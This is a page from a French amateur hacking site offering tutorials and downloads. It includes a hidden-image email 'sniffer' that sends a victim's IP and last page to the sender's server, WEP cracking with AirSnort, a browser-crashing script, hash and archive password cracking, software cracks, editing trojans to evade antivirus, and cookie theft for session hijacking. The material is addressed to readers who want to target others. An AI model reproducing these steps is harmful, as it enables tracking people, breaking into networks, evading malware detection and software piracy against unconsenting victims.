Quick basic Quick basic standard avec compilateur .exe 1Mo zip
Turbo Pascal and Turbo C: compilateur Pascal et C  
Dev-Pascal : Compilateur Pascal  
Dev-C++ : Compilateur C / C++ (nécessite make , un prog GNU)  
SmallC : Compilateur C (via concole ms-dos)  
BCX Compilateur C / C++ win32  
CoPascal extension de Pascal S compileur  
P32 compilateur Pascal  
PowerPascal compilateur Pascal  
Djgpp compilateur C / C++  
Free Pascal : compilateur Pascal  Win32/Linux  
ScriptBasic interpréteur de basic  
LCC-Win32 compilateur système pour windows  
lcc compilateur C standard (ISO)  
Yabasic : interpréteur basic & vb  pour windows ou Linux  
Pacific C for DOS : version gratuite d'un compilateur professionnel C en msdos  
GNAT : compilateur Ada95  
Rapid-Q compilateur Basic pour système alternatifs (Linux,Unix) et Win32  
Mingw module de Dev++ (GNU)  
B++  (recommandé par LsD) compilateur en pascal pour transformer le basic en C ou C++ et le compiler  

 39.Failles

N-Stealth est un logiciel qui connait plus de 30000 failles dans sa base de donnée et qui en fonction d'une ip scan et liste les failles utilisables selon les risques FAIBLE MOYEN et ÉLEVÉ. La version gratuite permet juste de faire cela, la version payante propose des informations sur les failles et les moyens de les réparer. Ayant un serveur IIS sous windows Xp je me suis rendu compte que certaines failles était bien réelles, en effet s'il est mal réglé mon ordinateur peut être scanné en mettant juste /../ après une adresse, le serveur parcours le répertoire précédent en fait, ceci est une faille de catégorie faible bien sur. Malgré un scan long ce programme s'avère très utile. [sujet non-terminé]  lien de téléchargement [lien]
 

 40.Dvd : cloner,copier,enregistrer un dvd protégé ou non

L'essentiel des dvd achetés dans le commerce sont protégés de la copie et des logiciels standards comme Clone DVD ne peuvent rien en faire. Mais vu que dans certains pays les lois sur la reproduction n'existent pas il existe des décodeurs CSS. Dvd-Cloner III intègre un décodeur CSS en plus de diverses fonctions qui se rapprochent du célèbre CloneDVD.  Dvd-Cloner III est payant car la version d'essais ne fait qu'une copie partielle du dvd. Télécharges le crack à partir de mon site ci-dessous, lis Installnotes.txt pour l'installer.
crack
DvdCloner III (lien externe)

41.Sniffer

1.Généralités
Un sniffer permet de voir le trafic des données sur sur un réseau mais plus généralement on attribue le terme "sniffer" à un programme qui permet de récupérer des informations d'un utilisateurs sans installer de programmes sur l'ordinateur cible, un sniffer est avant tout un script dans le cas contraire on parle de stealer. Le principe est simple, on envoie un mail à la cible, dans cet email en plus d'un message texte normal il y a du html caché qui envoie certaines données de la cible à une adresse email, un ftp, un ssh, ... bref sur un support qui permettra au pirate de récupérer ces données volées. Ces données sont récupérées et traitées généralement avec un script dynamique (php,cgi-bin,mysql,...). Avec un script html/php on ne peut pas récupérer grand chose, pas de mot de passes, pas de données précises mais l'ip de la cible, et quelques informations liées aux failles du navigateur de la cible. Avec Internet explorer on peut récupérer la dernière page visitée, ce qu'il y a dans le presse papier, par exemples.
2.Fonctionement
télécharger :  • script ip_sniffer  2Ko (récupère l'ip et la dernière page visitée par la cible avant de lire son mail)

Tu dois placer le fichier .php3 sur un ftp dont le serveur a une base de donnée dynamique php (free,lycos,webzanine,...) ensuite écrit un mail à la victime en rentrant le code html suivant , tu dois modifier les zones vertes.

<html><head></head><body>
message texte<br>message texte
<img src="http://www.url_de_ton_site.com/dossier/snif-ip.php3?hacker=ton_mail@provider.com&pigeon=mail_de_la_cible@provider.com">
</body></html>

Le principe est simple et consiste a appeler une image qui est en réalité le script snif-ip.php3 situé sur un de tes ftp, par défaut le script php insérera l'image white.gif qui est un carré blanc donc invisible chez hotmail. Tu pourras modifier cela dans le code source du script.
En retour tu reçois un mail avec les informations récupérer par le script [screenshot1] [screenshot2]. Selon la rapidité du serveur de mail l'ip de la cible peut avoir changé, une simple requête ping te le confirmera. Il est déconseillé d'envoyer de hotmail à hotmail par exemple parce que c'est particulièrement long.

42. Éditeur Hexadécimal

Téléchargements :
Ultra Edit v10.10c (lien externe)    [lien mort ?]
crack pour Ultra Edit v10.xxc
. winhex : éditeur hexadécimal .rar 11Ko
. w32dasm : windasm éditeur hexadécimal pour win32 .rar 513Ko
i voir aussi : cracking tools
 

43. Keyloggers
 

Un keylogger est similaire à un trojan du fait qu'il fonctionne en intrus sur une machine et est en communication (directe ou indirecte) avec celui qui l'utilise. Les keyloggers ont une fonction unique : enregistrer les touches tapées au clavier d'où leur nom Key (touche) logger (enregistreur). Le fichier où sont enregistrés les caractères tapés (le log) peut être envoyé par différentes manières : mail (le log est envoyé par pièce jointe à l'adresse mail du hacker via un serveur smtp quelconque souvent à définir) FTP (le log est enregistré sur ftp et tu dois lui donner login&mdp ce qui pose des problèmes de sécurité) ou encore via ssh même genre que le ftp.
. Téléchargements (13) :

 

44. crypteur / décrypteur de html

Source Code Encrypter v1.0

Chiffrer : compile le code html préalablement rentrée ou coller
dans le cadre.
Sélection : Ctrl-A
Voir : génère un aperçu en popup
Source : Édite la page source en décompilation
Efface : efface l'ensemble du tableau
 

Le codage étant réalisé par une fonction java script, les navigateurs classiques, IE, Mozilla, Netscape, Firefox, etc le traiteront automatiquement.

 

45. Wifi : pirater un réseau sans fil

Le wifi permet de conecter par ondes des appareils, dans le cas du wifi un ordinateur et un modem. Le wifi a une porté de 100 mètres environs, si tu arrives à te connecter sur un modem via wifi tu as accès à internet via ce modem et en plus tu peux infiltré l'ordinateur qui utilise ce modem. Voici le schéma que nous étudions :
Un client utilise un modem pour se conecter au net, son ordinateur est connecté par wifi à son modem via clé ou carte wifi. L'ordinateur d'un pirate est dans le rayon de portée du wifi.

Le hacker doit tout d'abord mettre son installation wifi en mode 'monitor' ce mode n'est pas encore possible sous Microsoft Windows car les drivers ne le permettent physiquement pas. Seul le système d'exploitation Linux permet de se mettre en mode monitor. Pour ceux qui n'ont pas Linux installez un émulateur : cigwin par exemple. Le mode monitor consiste à rendre un ordinateur capable d'écouter (de capter) les ondes wifi sans rien émettre. En monitor on peut détecter puis se conecter à un réseau wifi.

Mais évidement ce réseau wifi est protégé par une clé wifi assez longue la clé WEP. On va voir ci dessous comment la pirater. 

Air snort marche sous linux ou windows et permet de sniffer les réseaux et hacker les clés WEP, il est disponible depuis peu sous windows. il a besoin d'un certains nombre de paquets (5 à 10 millions) pour la trouver par calculs mathématiques mais l'expérience a prouvée qu'il peut trouver une clé WEP en 30 minutes, dans cette expérience les paquets qu'il analysait n'étaient que du ping en flood. Pour des paquets 'normaux' il lui faut trois à quatre heures si le client est tout le temps connecté, s'il se déconnecte le travail n'est pas perdu. Pour fonctionner Air snort doit connaitre l'ip du modem (du client) , pour cela reportez vous au sujets de LsD ci dessus, notement au sujet 'ip sniffer'. De nos jours de plus en plus de gens sont en IP fixes ! Avec des progs comme YGTBSM il y a moyen de faire des choses méchantes avec un Air snort.
 Téléchargements :

 
Air snort Linux (lien)
 •
Air snort windows 219Ko .rar
 •
cigwin  267Ko

pour xp :
lance airsnort.exe qui est dans le répertoire bin, et s'il te faut des .dll comme iconv.dll et intl.dll tu les trouveras sur dlldump, il faut installer GTK-Runtime-Environment-2.2.4-3.exe si ce n'est pas déjà fait. Enfin lance airsnort.exe en mode console ! sinon la fenêtre s'ouvre et se referme.

46. Peer to peer crypté

Les données envoyées sont toujours principalement en UDP donc bordélique mais ton FAI n'a aucun moyen d'identifier ce que tu fais car les données sont cryptés à l'envois et décryptées chez toi. Ci dessous une liste des premiers p2p cryptés :
Téléchargements :

.
Freenet
. Nodezilla
. Mute
. Ants
. Kameleon
. i2p
Expérimentals, certains sont encore à mettre au point ou sont juste lents, venez en parler sur le forum

47. script pour planter navigateur et système d'exploitation par saturation (overflow)

Bien que maintenant les navigateurs webs détecte les scripts qui vont faire planter le processeur cela peut être pratique pour déconnecter, planter, etc le pc de quelqu'un qui utilise un ancien navigateur (win98 par exemple). Redirigez le vers une page html contenant le script suivant :

<script type="text/javascript">
while (1)
</script>

48. md5 (Message digest 5) et autres algorithmes de cryptage

Introduction :
Le fonctionnement de l'authentification sur un serveur dépend de son système d'exploitation (essentiellement Windows et UNIX) et du logiciel serveur web utilisé (Apache fonctionne sur toutes les plates-formes, et Microsoft IIS sous Windows uniquement).

  • Crypt : algorithme le plus utilisé, basé sur le DES. Passe partout sous UNIX, mais pas pour Apache pour Windows et TPF. Pour les mots de passe ainsi codés, seuls les 8 premiers caractères comptent pour le cryptage.
  • MD5 : algorithme à base de MD5 reconnu uniquement par les serveurs Apache, quelle que soit la plate-forme utilisée.
  • SHA : Utilisé essentiellement pour faciliter la migration de ou vers les serveurs Netscape utilisant LDIF (LDAP Directory Interchange Format).

md5
Le md5 est un algorithme de cryptage (hachage cryptographique) il est très répandu bien qu'il ne soit pas spécialement sur. Le md5 est la suite du md4, dans le même genre mais en plus sécurisé il y a le sha-256, le ripemd ou encore whirpool. Hacker un md5 se fait par brute force, un mot de passe de 5 caractère en md5 prends 10 secondes à décryptés mais un mot de passe de plus de 8 caractère mettrait des années à être décrypté. Néanmoins les programmes de bruteforce pour md5 font ça à partir de dictionnaire et sont donc assez rapide. Via une grosse base de donnée et du php on peut même faire un cryptage et un décryptage de md5 instantanée en ligne quasi instantané - J'ai placé ci dessous un formulaire et les rares liens du net qui proposent ce genre de service.
Codé en 128bits le md5 se présente toujours sous la forme de 35 caractères, il est très improbable qu'un même md5 corresponde à deux mots différents. Le md5 est encore utilisé de nos jours pour la sécurité des système Gnu et Linux, notement dans les htaccess.
Le rainbow cracking permet (en gros) d'exploiter le code md5 et de le cracker beaucoup plus rapidement, mais les codes md5 sont protégés par un 'salt' un ajout de code et cette méthode ne marche plus. Note aussi que le terme 'cracker' pour un md5 n'est pas correcte, le md5 ne se crack pas il se décrypte.
Exemple : f5136948bad11041edafc422e87cc484 correspond au mot 'dagost'
Exemple : 09c3baf843a653211569e3b00f1328cf
 correspond au mot 'dAgost'
Les mots de passes unix de 13 caractères sont en crypt (htpasswd par exemple)

téléchargements pour windows  Utilisateurs de Linux, vous pouvez compiler John avec make.
John the ripper (-386) brute force pour md5 et crypt - mode console   1.3Mo .zip (existe pour unix & dos)
rainbow crack 1.2  brute force sur les rainbow - mode console  548Ko .zip
MDcrack-NG  brute force md5, base64, QuotedP et ascii/hexa  4.43Mo .exe
liste d'exemples .txt

Crackage de hash divers en ligne :

si la base de donnée ci-dessus est insuffisante essaie une de celles ci :
• convertir et décrypter du md5 en ligne [lien]
• convertir un mot en crypt, md5 ou SHA-1 avec ce formulaire javacript en ligne : [lien]
• convertir et décrypter du md5 en ligne par rainbow table [lien]
imettez cette page en favoris : http://dagost.free.fr/hack_md5.htm  pour ne pas tout recharger.

49. Navigateurs web alternatifs

Bien que la majorité des utilisateurs utilisent Internet Explorer, Mozilla ou encore le navigateur fournit par leur fournisseur (comme Wanadoo) il existe d'autres navigateurs. Un pirate n'étant pas un utilisateur 'normal' il a besoin de matériel efficace, deplus ces navigateurs alternatifs sont au niveau sécurité plus évolué que les navigateurs standards, Internet explorer est en effet particulièrement vulnérable.
Internet Explorer (IE) est vulnérable de quatres grandes manières :
1. informations mal stockées (dernière page visité, navigateur, système et version, nom de l'ordinateur, contenu du presse papier peuvent être récupérer avec un simple script)
2. nombreuses failles (noyau mais aussi java, flash, images, ... ) donc beaucoup de vers et malwares qui nuisent à l'ordinateur
3. ActiveX peut prendre le contrôle de l'ordinateur
4. un trojan pw.stealer peut récupérer login et mdp utilisés pour IE.
Ci dessous les navigateurs alternatifs les plus connus, ils n'utilisent pas le moteur de Internet Explorer et sont gratuits :
 
K-Meleon navigateur type opéra avec header modifiable, multi-proxy ... [lien]
Lynx navigateur texte seulement [lien]
Opéra beaucoup d'options de sécurité (désactiver les scripts par exemple)  ftp : toutes options, news [lien]
Firefox Mozilla avec plus d'options - protocoles ftp (lecture seulement) , news [lien]
Mozilla & Mozilla Firefox Mozilla navigateur sécurisé pour le grand public - pas de ftp et de news sans modules [lien]

50. Décompiler java et flash

Mon site n'est pas un site de cracking, bien qu'il contienne des liens, des moteurs de recherches, etc. Je classe la décompilation du java et du flash dans le hacking standard, java et flash étant deux langages de programmation typique d'Internet (ne pas confondre java et javascript). Décompiler permet d'avoir accès au(x) script(s) internes de l'applet java ou du programme en flash - par exemple il est simple de trouver un mot de passe d'un formulaire flash ou java après avoir décompiler.
Après avoir récupérer (source + getright) les fichiers à cracker (.class pour les java et .swf pour les flash) il suffit de les ouvrir avec leur décompilateur respectif, j'allongerai la liste un de ces jours et y ajouterai les cracks :

pour les .class (fichiers java) : DJ Java decompiler (dernière version)
pour les .swf (fichiers flash)  : flash decompiler 2.9
décompilateur flash .rar 84Ko Flash

En étudiant le code source qui est plus ou moins logique selon ton niveau on arrive facilement à retrouver le mot de passe (par exemple) d'un programme flash ou d'un applet java voir ci dessous :

note : pour les applets java c'est différent; le code n'est pas forcement dans la source mais il est en général dans un fichier, lequel est indiqué dans le code.

51. Cracker une archive zip ou rar protégée par mot de passe

Lors de la création d'une archive, un mot de passe peut être installé et bien que les .zip soient plus anciens que les .rar ces deux systèmes ne sont crackables que par la même méthode : la brute force. Néanmoins vu que la brute force ne se fait pas via le net elle est très rapide : 1.000.000 mdp testés / seconde  en moyenne pour un processeur de 1.5Ghz. Ainsi un mot de passe égal ou inférieur à 6 caractères est crackable en une minute maximum, au dessus de 6 caractères le temps augmente vite, sauf si le mot de passe n'est composé que de chiffres. Il faut bien configurer son programme de brute force en fonction des caractères (charsets) du mot de passe à cracké : lettres minuscules, lettres majuscules, les deux, que des chiffres, tous les caractères existants, etc ... Les programmes que le site de dagost propose ci-dessous permettent aussi de faire une attaque à partir d'un dictionnaire, Ils ne sont pas gratuit mais je mets à ta disposition leur crack ou serial respectif dans le répertoire /Lsd, lis bien les instructions.
pour les zip : • AZPR : Advance Zip Password Recovery v.4.0 (le plus connus)  1.6Mo
pour les rar : • RAR Password cracker  343Ko
Pour comprendre leur fonctionnement, en attendant un tutorial vous pouvez consultez le site de leur créateur ou le forum du site de dagost si vous rencontrez un problème. Tu peux aussi télécharger winrar à partir de la page de téléchargement du site de dagost, winrar est gratuit en shareware illimité :]

52. Décompiler un exécutable, changer sa signature virale

Modifier un exécutable peut permettre que ce dernier ne soit plus détecter par un Antivirus. Un exécutable est un programme compilé, c'est à dire qu'on ne voit plus sa source et comme son nom l'indique il est fait pour être exécuter. On ne peut pas récupérer la source d'un exécutable en le décompilant mais on peut obtenir de l'assembleur : le language machine. On peut décompiler un exécutable à deux niveaux., et seul le premier permet de modifier facilement l'éxécutable.

Introduction :
Ci-contre la représentation des différentes étapes d'un programme et en dessous leurs aspects concrets. Encore en dessous le vocabulaire légendé des processus de transformation.

 

1. compilation
2. décompilation (impossible en pratique)
3. assemblage
4. désassemblage (par abus de language décompilation)

On distingue deux types d'éxécutable : les Win32 et les Win16 , le nombre indique les bits utilisé, bien que les récents windows peuvent exécuter un exécutable win16 grâce à wowexec tous les nouveaux exécutables sont en 32bits (bientôt 64)

1er niveau : les ressources
Un exécutable est organisé en ressources indiquant ses spécificités : mode utilisé, icône de l'exécutable, commentaires, variables, ...
Des programmes comme ResHacker permettent de les éditer. On peut souvent rendre un trojan indétectable en modifiant les variables de ses ressources, en remplaçant les commentaires et en changeant l'icône.
J'ai utilisé ResHacker pour éditer les ressources d'un utilitaires bien connus : Hijackthis

 

Le bouton "Compile script" permet de recompiler après avoir fait des modifications.

 

Ci-dessous : téléchargements d'outils pour éditer des .exe au 1er niveau

ResHack v3.4 (celle ci-dessus) 542Ko .zip
icône inserter v1.0 insert ou change une icône sur un .exe 10Ko .zip

2eme niveau : l'assembleur
Le langage assembleur dit aussi assembleur ou abrégé ASM, est le langage de programmation lisible pour un humain le plus proche du langage machine utilisé par le microprocesseur de la machine. Contrairement à un langage de 'haut niveau', il y a une correspondance un à un entre le code assembleur et le langage machine, ainsi il est possible de traduire le code dans les deux sens sans perdre d'information. La transformation du code assembleur en langage machine est accomplie par un programme nommé assembleur, dans l'autre sens par un programme désassembleur. Les opérations s'appellent respectivement assemblage et désassemblage. Dans un programme réel en assembleur, c'est un peu plus complexe que cela (on peut donner des noms aux routines, aux variables), et on n'a plus cette correspondance. Sur les premiers ordinateurs, la tâche d'assemblage était accomplie manuellement par le programmeur : avec des trous.
Ci-dessous toujours Hijackthis.exe mais décompiler avec PE Explorer version 1.98 : remarquez les instructions typiques de l'ASM push , mov, call.

Téléchargements :
• PE Explorer 1.98  2.67Mo [lien] 30 jours d'essais - patch v1.98 ( sinon 120$ )

 

Upx
Upx est un programme qui compacte efficacement les exécutables selon 3 techniques, il se peut qu'après le passage de Upx ResHack ne puisse opérer , il te le dit. Dans ce cas là il faut décompresser l'éxécutable avec un programme comme ressource tuner (même boite que PE Explorer) qui gère upx avec le plugin UPX-Unpacker
Téléchargements :
. Upx   247Ko .rar -mode console
. ressource tuner 1.98  2.02 Mo [lien] 30 jours d'essais

* le patch pour PE Explorer est testé il marche au contraire de ceux pour PE Explorer qui plantent :s
  décompiler, modifier puis recompiler un programme sous copyright est illégal
  n'hésitez pas à proposer d'autres outils sur le forum, par mail ou sur irc.

Pour plus d'infos voir 53. cracking tools l

53. Cracking : outils nécessaires @ tools

i compilateurs
. Delphi : décompilateur Delphi .rar 761Ko
. Flash : décompilateur flash .rar 84Ko
.
vb : décompilateur visual basic .rar 579Ko
.
OllyDbg : désassembleur et analyseur par étapes .rar 1.6Mo
.
w32dasm : windasm éditeur hexadécimal pour win32 .rar 513Ko
.
winhex : éditeur hexadécimal .rar 11Ko
.
RDG : analyse et révèle un compresseur éventuelle .rar 233Ko

54. Exploits

55. cookies

Un cookie est un fichier texte qui contient des données qui vous identifie auprès d'un siteweb, on ne va pas revenir dessus. Un cookie contient des variables : son nom, son contenu, le serveur qui l'utilise et dans quel répertoire, son utilisation (pour des connections cryptées seulement ou pour toutes les connections) et sa dâte d'expiration.
Si vous ouvrez un cookie (ici un de google) avec un éditeur de texte vous obtenez un texte semblable à ceci :
 
PREF□ID=19864ed93f467011:TM=1157102462:LM=1157102462:S=rIZfpPc2yCMH0zlv□goo
gle.fr/□15362618878336□32111634□4000279664□29805991□*

le signifie un retour à la ligne et la fin d'une variable, comprenez donc plutôt :
PREF
ID=19864ed93f467011:TM=1157102462:LM=1157102462:S=rIZfpPc2yCMH0zlv
google.fr/
1536
2618878336
32111634
4000279664
29805991
*

le nom du cookie est PREF
son contenu est ID=2badd29ac120c61a:TM=1157292239:LM=1157292239:S=EeCU8xk6ejV6leOK
  Le contenu ne peut en théorie n'être compris que par le site. Le contenu est souvent crypté.
le serveur qui l'utilise est google.fr dans la racine (google.fr/)
ce cookie expire le dimanche 17 septembre 2006 à 16h03, cette information est aussi cryptée

Un cookie peut contenir dans son contenu un mot de passe ou du moins peut contenir une clé qui indique que le possesseur de ce cookie a tel ou tel pouvoir sur tel ou tel serveur, session, page ... Il y a donc deux grands moyens de hacker via les cookies :
1. voler et stocker les cookies d'un utilisateur, les examiner pour trouver un mot de passe éventuel (session hijacking)
2. modifier ses propres cookies pour avoir accès à quelque chose de protéger. (cookie spoofing)
Les scripts https et les serveurs sécurisés cryptent leur cookie avec des clés de façon que seuls eux puissent les comprendre, dans ce cas là l'examen d'un cookie est impossible et on en revient à devoir voler un cookie. En effet Dans un espace privé accédé en http, les cookies peuvent être échangés en https afin d'en assurer la confidentialité du contenu. Les navigateurs sont en effet tenus de fournir à l'application web via un canal protégé tout cookie déposé de façon sécurisée. Les identifiants de session sont donc en sécurité.

Ce genre d'attaque risque de ne pas marcher sur des navigateurs web assez sécurisé comme Mozilla qui gère et cache lui même les cookies, sinon celà fonctionne sur tous les navigateurs de la gamme windows.

Pour modifier un cookie il existe des dizaines de méthodes et sûrement autant de prog pour le faire, ci-dessous trois façons simple :

avec opéra :

avec Mozilla et le plugin AnEC Cookie Editor :

Ou encore tout simplement avec IE et le javascript :


 

syntaxe : Set-Cookie: NAME=VALUE; expires=DATE; domain=DOMAIN_NAME;path=PATH; secure

 

dagost © 2004 - 2007 - dagost.org